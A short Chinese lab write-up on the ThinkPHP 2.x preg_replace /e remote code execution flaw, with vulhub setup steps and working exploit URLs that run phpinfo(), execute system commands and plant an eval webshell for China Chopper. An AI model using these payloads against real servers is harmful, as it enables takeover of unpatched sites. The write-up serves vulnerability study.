ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP 2.x版本中,使用
preg_replace
的/e
模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
漏洞环境
我们先下载环境,在github有别人直接搭建好的docker环境我们直接拿来用即可
git clone git://github.com/vulhub/vulhub.git cd vulhub/thinkphp/2-rce/ docker-compose up -d
访问IP:8080/Index.php即可看到一个Web页面。
影响版本
ThinkPHP 2.x
漏洞复现
执行POC,尝试是否存在漏洞
http://192.168.200.23:8080/index.php?s=/E/D/I/${phpinfo()}
phpinfo执行成功证明存在漏洞
尝试执行系统命令
http://192.168.200.23:8080/index.php?s=/E/D/I/${system(pwd)}
连接菜刀,密码EDI
http://192.168.200.23:8080/index.php?s=/E/D/I/${@print(eval($_POST[EDI]))}
连接成功